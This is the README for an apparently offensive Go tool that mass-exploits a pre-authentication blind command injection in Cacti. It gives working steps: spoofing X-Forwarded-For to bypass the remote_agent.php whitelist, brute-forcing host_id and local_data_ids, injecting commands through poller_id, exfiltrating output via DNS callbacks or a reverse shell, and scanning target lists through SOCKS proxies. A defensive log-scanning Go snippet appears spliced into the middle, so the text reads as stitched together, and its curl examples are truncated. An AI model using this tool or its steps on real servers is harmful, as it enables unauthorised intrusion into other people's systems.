# Cacti Blind Remote Code Execution (Pre-Auth)
This is for educational purposes only. I am not responsible for your actions. Use at your own discretion.
This script bruteforces the variables required to exploit this vulnerability. The exploit requires the following 3 variables:
- Whitelisted IP address
- Correct `host_id` parameter
- Correct `local_data_ids` parameter
The file `remote_agent.php` is protected by an IP whitelist. You can bypass this by spoofing your IP address in the `X-Forwarded-For` header. Most instances will have `127.0.0.1` or the server's own IP address whitelisted.
Next you need to bruteforce the `host_id` and `local_data_ids` request parameters. This is done by enumerating pairs of integers `x,y` between a default min value of 1 and max value of 10.
```
curl -k -H "X-Forwarded-For: 127.0.0.1" \
```
After you've gotten these 3 variables, you can inject a shell command into the `poller_id` key, escaping the original value by putting a `;` before your command.
This is a blind RCE, so you need to send the output of your command somewhere like interact.sh or open a reverse shell. Remember to URL-encode the `poller_id` value!
The following executes the command `ping $(whoami).test.com`:
```
curl -k -H "X-Forwarded-For: 127.0.0.01" \
```
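As an added detection-side example (not part of this script or of Cacti itself), the following Go program scans constructed access-log lines and flags requests to `remote_agent.php` whose `X-Forwarded-For` claims a loopback source while the TCP client is not loopback, or whose `poller_id` is not a plain integer. The custom log format (client IP, quoted `X-Forwarded-For` header, quoted request line), the sample lines and the `Inspect` function are all assumptions made for this example.

```go
package main

import (
	"fmt"
	"net/url"
	"strconv"
	"strings"
)

// Constructed sample lines in an assumed custom access-log format:
// <client-ip> "<X-Forwarded-For header, or ->" "<METHOD> <path?query>"
var sampleLog = []string{
	`203.0.113.10 "-" "GET /cacti/index.php"`,
	`203.0.113.10 "127.0.0.1" "GET /cacti/remote_agent.php?action=polldata&host_id=1&poller_id=1&local_data_ids[]=1"`,
	`203.0.113.10 "127.0.0.1" "GET /cacti/remote_agent.php?action=polldata&host_id=2&poller_id=1%3Bping%20x.example&local_data_ids[]=3"`,
	`10.0.0.5 "-" "GET /cacti/remote_agent.php?action=polldata&host_id=1&poller_id=1&local_data_ids[]=1"`,
}
func isLoopback(ip string) bool { return ip == "127.0.0.1" || ip == "::1" }

// Inspect returns one "line N: reason" finding per remote_agent.php request
// whose X-Forwarded-For claims loopback while the TCP client is not loopback
// (the whitelist bypass), or whose poller_id is not a plain integer.
func Inspect(lines []string) []string {
	var out []string
	for i, line := range lines {
		parts := strings.Split(line, `"`) // [client, xff, " ", request, ""]
		if len(parts) < 4 || len(strings.Fields(parts[3])) < 2 {
			continue
		}
		client, req := strings.TrimSpace(parts[0]), strings.Fields(parts[3])
		u, err := url.Parse(req[1])
		if err != nil || !strings.HasSuffix(u.Path, "/remote_agent.php") {
			continue
		}
		if isLoopback(parts[1]) && !isLoopback(client) {
			out = append(out, fmt.Sprintf("line %d: X-Forwarded-For claims loopback from %s", i+1, client))
		}
		if pid := u.Query().Get("poller_id"); pid != "" {
			if _, err := strconv.Atoi(pid); err != nil {
				out = append(out, fmt.Sprintf("line %d: non-numeric poller_id %q", i+1, pid))
			}
		}
	}
	return out
}
func main() {
	for _, f := range Inspect(sampleLog) {
		fmt.Println(f)
	}
}
```

Web servers do not log `X-Forwarded-For` by default, so a log format that records it must be configured before this check is useful.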
The script outputs in CSV format. The headers are `"target", "ip", "host_id", "data_id", "url"`.
If the `url` value is missing, it means the script was able to bypass the IP restriction but not successfully bruteforce the IDs. You can take this output and set a higher max value to attempt again.
## Parsing Output
You can use the following commands to quickly parse the output file.
### Targets with IP restriction bypassed
```
tail -n +2 results.csv | cut -d ',' -f1 | sort -u
```
### Exploitable Targets
```
tail -n +2 results.csv | cut -d ',' -f5 | sort -u
```
## Usage
```
go build -v -o bruteforce bruteforce.go
./bruteforce -l targets.txt -t 50 -min 1 -max 10
```
- **Targets must be a list of IP addresses; the port may be omitted**
- Socks5 proxy is supported `-proxy socks5://127.0.0.1:9050`
- Default output file is `results.csv`